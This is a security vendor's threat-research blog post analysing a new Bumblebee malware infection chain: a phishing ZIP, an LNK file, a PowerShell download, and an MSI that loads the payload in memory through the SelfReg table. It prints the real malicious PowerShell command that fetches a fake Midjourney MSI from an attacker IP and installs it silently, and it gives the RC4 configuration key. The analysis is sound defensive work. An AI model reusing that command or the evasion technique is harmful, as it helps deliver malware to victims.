New Bumblebee Loader Infection Chain Signals Possible Resurgence

www.netskope.com · Leandro Froes · 1 year ago · research
quality 7/10 · good
0 net
Tags
bunblee-bee loader infection-chain
New Bumblebee Loader Infection Chain Signals Possible Resurgence - Netskope Platform Products Solutions Resources Company Get Started English Français 日本語 Español Português Deutsch Italiano Back English Français 日本語 Español Português Deutsch Italiano Platform Platform Netskope One Platform Zero Trust Engine SkopeAI NewEdge Network Security and Network Convergence (SASE) Security Convergence (SSE) Products Converged Products SASE SSE Converged Access Converged Gateway Unified Data Security AI Security Agentic Broker AI Gateway AI Red Teaming AI Guardrails GenAI Security Web, Cloud and AI Security Next Gen Secure Web Gateway Cloud Inline Security Zero Trust Network Access Firewall as a Service Enterprise Browser Remote Browser Isolation GenAI Security Threat Protection Data Security Data Loss Prevention Data Security Posture Management Cloud Access Security Broker SaaS Security Posture Management Security for AI Networking Secure SD-WAN Firewall as a Service Endpoint SD-WAN Micro Branch Device Intelligence Analytics Advanced Analytics Digital Experience Management Experience Netskope Experience Netskope Hands-on Labs Product Demos Private Access Test Drive Workshops Solutions By Use Cases Insider Risk Maintain Compliance Modernize Access with Universal ZTNA Replace VPNs Secure Managed Cloud Apps Secure Unmanaged Cloud Services Securing AI Simplify & Consolidate Infrastructure IoT Intelligence Access Wireless WAN Multi-Cloud Networking By Industries Financial Services & Insurance Healthcare and Life Sciences High Technology Legal Manufacturing Retail and Hospitality Service Companies Utilities Public Sector and Education US Public Sector US Federal Government US State & Local Government Higher Education K12 Australian Government UK Public Sector Resources Resource Library Resource Library Analyst Reports Case Studies Compliance Guides Data sheets Demos & Videos eBooks Infographics Netskope Resources Points of View Podcasts Product Documentation Reference Architectures Reports & Guides Solution Briefs Webinars White Papers Netskope Threat Labs Cloud and Threat Report Threat Labs Reports Services and Support Customer Solutions Professional Services Customer Success Technical Support Service Delivery Partners Customer Community Product Documentation Support Portal Trust Portal URL Lookup Connect Blog Behind the Scenes Full Skope News & Announcements Platform, Products, & Services Threat Labs Data Security Council Events Netskope SASE Summit SASE Week Executive Briefing Program Experience Netskope Hands-on Labs Product Demos Test Drive Workshops Training and Accreditations Netskope Academy Training The SASE Accreditation Security Defined Security Defined Overview What is SASE? What is Security Service Edge? What is SD-WAN? What is AI Security? What is AI Security Posture Management (AI-SPM)? What is a Cloud Access Security Broker (CASB)? What is Data Loss Prevention (DLP)? What is Data Security Posture Management (DSPM)? What is Zero Trust Network Access (ZTNA)? What is a Next Generation Secure Web Gateway (SWG)? What is Digital Experience Monitoring? What is Firewall-as-a-Service? What is Remote Browser Isolation (RBI)? What is SaaS Security Posture Management? What is Data Lineage? What is Generative AI? What is Zero Trust Security? What is FedRAMP? What is Microsegmentation? What is a Proxy Server? What is MCP? What is Coffee Shop Networking? Company Why Netskope Why Netskope A Leader in Security Service Edge (SSE) A Leader in Secure Access Service Edge (SASE) A Forrester Wave™ SSE Solutions Leader A Forrester Wave™ SASE Solutions Leader Achieve Business Value with Netskope One SSE Customers Business Value Services AI Labs About Corporate Overview Leadership Team Our Values Corporate Social Responsibility Security, Compliance & Assurance Investor Relations Newsroom Press Releases Events Careers Job Openings Partners Partner Portal Partners Overview Service Delivery Specialization Service Providers Managed Solution Providers System Integrators Technology Partners & Integrations Our Technology Partners Cloud Exchange Support Language Platform Netskope One Platform Zero Trust Engine SkopeAI NewEdge Network Security and Network Convergence (SASE) Security Convergence (SSE) Your Network of Tomorrow Plan your path toward a faster, more secure, and more resilient network designed for the applications and users that you support. Get the white paper Converged Products AI Security Web, Cloud and AI Security Data Security Networking Analytics Experience Netskope SASE SSE Converged Access Converged Gateway Unified Data Security Agentic Broker AI Gateway AI Red Teaming AI Guardrails GenAI Security Next Gen Secure Web Gateway Cloud Inline Security Zero Trust Network Access Firewall as a Service Enterprise Browser Data Loss Prevention Data Security Posture Management Cloud Access Security Broker SaaS Security Posture Management Secure SD-WAN Firewall as a Service Endpoint SD-WAN Micro Branch Device Intelligence Advanced Analytics Digital Experience Management Experience Netskope Hands-on Labs Product Demos Private Access Test Drive Workshops Remote Browser Isolation GenAI Security Threat Protection Security for AI Get Hands-on With the Netskope Platform Here's your chance to experience the Netskope One single-cloud platform first-hand. Sign up for self-paced, hands-on labs, join us for monthly live product demos, take a free test drive of Netskope Private Access, or join us for a live, instructor-led workshops. Experience Netskope Netskope is recognized as a Leader Furthest in Vision for both SSE and SASE Platforms 2X a Leader in the Gartner® Magic Quadrant for SASE Platforms One unified platform built for your journey Get the report Netskope One AI Security Organizations need secure AI to move their business forward, but controls and guardrails must not require sacrifices in speed or user experience. Netskope can help you say yes to the AI advantage. Learn about Netskope One AI Security Netskope One AI Security Organizations need secure AI to move their business forward, but controls and guardrails must not require sacrifices in speed or user experience. Netskope can help you say yes to the AI advantage. Learn about Netskope One AI Security Modern Data Loss Prevention (DLP) for Dummies Get tips and tricks for transitioning to a cloud-delivered DLP. Get the eBook Modern SD-WAN for SASE Dummies Stop playing catch up with your networking architecture Get the eBook Understanding where the risk lies Advanced Analytics transforms the way security operations teams apply data-driven insights to implement better policies. With Advanced Analytics, you can identify trends, zero in on areas of concern and use the data to take action. Get the brochure By Use Cases By Industries Public Sector and Education Insider Risk Maintain Compliance Modernize Access with Universal ZTNA Replace VPNs Secure Managed Cloud Apps Secure Unmanaged Cloud Services Financial Services & Insurance Healthcare and Life Sciences High Technology Legal US Public Sector US Federal Government US State & Local Government Higher Education K12 Securing AI Simplify & Consolidate Infrastructure IoT Intelligence Access Wireless WAN Multi-Cloud Networking Manufacturing Retail and Hospitality Service Companies Utilities Australian Government UK Public Sector 6 Reasons Universal ZTNA is a Smart Escape from VPN and NAC Chaos Ditch the complexity of VPNs and NAC. Learn how Universal ZTNA secures every user and device with one consistent framework. Get the eBook Colgate-Palmolive Safeguards its "Intellectual Property” with Smart and Adaptable Data Protection Read the case study Netskope achieves FedRAMP High Authorization Choose Netskope GovCloud to accelerate your agency’s transformation. Learn about Netskope GovCloud Resource Library Services and Support Connect Training and Accreditations Security Defined Resource Library Analyst Reports Case Studies Compliance Guides Data sheets Demos & Videos eBooks Infographics Netskope Resources Customer Solutions Professional Services Customer Success Technical Support Service Delivery Partners Blog Behind the Scenes Full Skope News & Announcements Platform, Products, & Services Threat Labs Data Security Council Netskope Academy Training The SASE Accreditation Security Defined Overview What is SASE? What is Security Service Edge? What is SD-WAN? What is AI Security? What is AI Security Posture Management (AI-SPM)? What is a Cloud Access Security Broker (CASB)? What is Data Loss Prevention (DLP)? What is Data Security Posture Management (DSPM)? Points of View Podcasts Product Documentation Reference Architectures Reports & Guides Solution Briefs Webinars White Papers Customer Community Product Documentation Support Portal Trust Portal URL Lookup Events Netskope SASE Summit SASE Week Executive Briefing Program What is Zero Trust Network Access (ZTNA)? What is a Next Generation Secure Web Gateway (SWG)? What is Digital Experience Monitoring? What is Firewall-as-a-Service? What is Remote Browser Isolation (RBI)? What is SaaS Security Posture Management? What is Data Lineage? Netskope Threat Labs Cloud and Threat Report Threat Labs Reports Netskope Technical Support Our qualified support engineers are located worldwide and have diverse backgrounds in cloud security, networking, virtualization, content delivery, and software development, ensuring timely and quality technical assistance Technical Support Experience Netskope Hands-on Labs Product Demos Test Drive Workshops Netskope Training Netskope training will help you become a cloud security expert. We are here to help you secure your digital transformation journey and make the most of your cloud, web, and private applications. Explore Netskope Training What is Generative AI? What is Zero Trust Security? What is FedRAMP? What is Microsegmentation? What is a Proxy Server? What is MCP? What is Coffee Shop Networking? Why Netskope About Partners Why Netskope A Leader in Security Service Edge (SSE) A Leader in Secure Access Service Edge (SASE) A Forrester Wave™ SSE Solutions Leader A Forrester Wave™ SASE Solutions Leader Achieve Business Value with Netskope One SSE Corporate Overview Leadership Team Our Values Corporate Social Responsibility Security, Compliance & Assurance Partner Portal Partners Overview Service Delivery Specialization Service Providers Managed Solution Providers System Integrators Customers Business Value Services AI Labs Investor Relations Newsroom Press Releases Events Technology Partners & Integrations Our Technology Partners Cloud Exchange Maximize your SASE ROI with Netskope Business Value Services Start proving ROI. Netskope BVS is a complimentary consulting service that quantifies the financial and strategic impact of your SASE transformation. Request a consultation Careers Job Openings Let's do great things together Netskope’s partner-centric go-to-market strategy enables our partners to maximize their growth and profitability while transforming enterprise security. Netskope Partners Blog Threat Labs New Bumblebee Loader Infection Chain Signals Possible Resurgence New Bumblebee Loader Infection Chain Signals Possible Resurgence Oct 18 2024 By Leandro Fróes Share this article Share Request Demo Summary Bumblebee is a highly sophisticated downloader malware cybercriminals use to gain access to corporate networks and deliver other payloads such as Cobalt Strike beacons and ransomware. The Google Threat Analysis Group first discovered the malware in March 2022 and named it Bumblebee based on a User-Agent string it used. The Netskope Threat Labs team discovered what seems to be a new infection chain leading to Bumblebee malware infection, and our findings corroborate those shared by other researchers . In this blog post, we will analyze all the files involved in the chain until the execution of the Bumblebee payload. Key findings This is the first occurrence of a Bumblebee campaign we have seen since Operation Endgame , an operation performed by Europol in May 2024 to disrupt the major malware botnets, such as Bumblebee, IcedID, and Pikabot. The infection chain used to deliver the final payload is not new, but this is the first time we have seen it being used by Bumblebee. These activities might indicate the resurfacing of Bumblebee in the threat landscape. Initial infection The infection likely starts via a phishing email luring the victim to download a ZIP file and extract and execute the file inside it. The ZIP file contains an LNK file named “Report-41952.lnk” that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns. LNK and powershell again? The usage of LNK files is very common in Bumblebee campaigns, either to download the next stage payloads or to directly execute files. In this case, the file is used as a downloader and is responsible for downloading and executing the next stage of the infection chain. Once opened, the LNK file executes a Powershell command to download an MSI file from a remote server, renames it as “%AppData%\y.msi”, and then executes/installs it using the Microsoft msiexec.exe tool. %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest "https:///193.242.145.138/mid/w1/Midjourney.msi" -OutFile "%appdata%\y.msi";msiexec /i %appdata%\y.msi /qn The option “/qn” is used to make sure there’s no user interaction needed in this step, making the execution of the LNK file the last step that requires user interaction in the whole chain. New MSI approach Using MSI files to execute payloads is a very successful technique several adversaries use. Some well-known malware families, such as DarkGate and Latrodectus , are examples of how effective this method can be in both luring users and bypassing defenses. Similar to the mentioned cases, the new Bumblebee payload is delivered via MSI files. The analyzed samples are disguised as Nvidia and Midjourney installers. They are used to load and execute the final payload all in memory, without even having to drop the payload to disk, as observed in previous campaigns using ISO files. Regarding MSI files, most malware, including earlier versions of Bumblebee, use the CustomAction table to specify which steps to execute during the MSI installation. LOLBins , such as rundll32.exe and regsvr32.exe are commonly used to load malicious DLL via MSI files as well as powershell.exe to execute PowerShell scripts, as observed in previous Bumblebee campaigns. From an attacker perspective, the downside of these approaches is that once any of those tools execute, a new process is created, opening the opportunity for defenders to flag unusual events, such as the rundll32 process being created by msiexec. In the analyzed version, Bumblebee uses a stealthier approach to avoid the creation of other processes and avoids writing the final payload to disk. It does so by using the SelfReg table to force the execution of the DllRegisterServer export function present in a file in the File table. The entry in the SelfReg table works as a key to indicate what file to execute in the File table and in our case it was the final payload DLL. The mentioned DLL is present in an CAB file named “disk1” and once the MSI installation starts, the DLL is loaded in the msiexec process address space and its DllRegisterServer export function is called, leading to the unpacking and execution of the Bumblebee payload. The following image is an example of the final payload mapped in the memory of the msiexec process. Bumblebee payload By analyzing the unpacked payload, we can flag some well-known characteristics of Bumblebee, such as its internal DLL name and exported functions. The configuration extraction approach is the same as the other versions. The malware uses a clear-text hardcoded key as an RC4 key to decrypt the encrypted configuration. In the analyzed samples, the key used was the “NEW_BLACK” string. The decrypted port was 443 and the campaign ID was “msi” and “lnk001”. The full analysis of the Bumblebee payload is out of the scope of this blog post. The Netskope Threat Labs team will monitor Bumblebee activities and follow up on the analysis when we have more information. Netskope Detection Netskope Advanced Threat Protection provides proactive coverage against this threat. Win32.Trojan.BumblebeeLNK Win64.Trojan.BumbleBee IOCs All the IOCs and scripts related to this malware can be found in our GitHub repository . Threat Labs Next Story > Back Next > Leandro Fróes Leandro Fróes is a Senior Threat Research Engineer at Netskope, where he focuses on malware research, reverse engineering, automation and product improvement. Leandro Fróes is a Senior Threat Research Engineer at Netskope, where he focuses on malware research, reverse engineering, automation and product improvement. Read More More Articles by Leandro Fróes Read full Bio More articles Related Articles List Grid Threat Labs From ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel By Jan Michael Alcantara Read the blog Threat Labs OpenClaw Trap: AI-Assisted Lure Factory Targets Developers & Gamers By Vini Egerland Read the blog Threat Labs Attackers Weaponize Signed RMM Tools via Zoom, Meet, & Teams Lures By Jan Michael Alcantara Read the blog Show More Subscribe to the Netskope Blog Sign up to receive a roundup of the latest Netskope content delivered directly in your inbox every month. Subscribe now -->
← Back to stories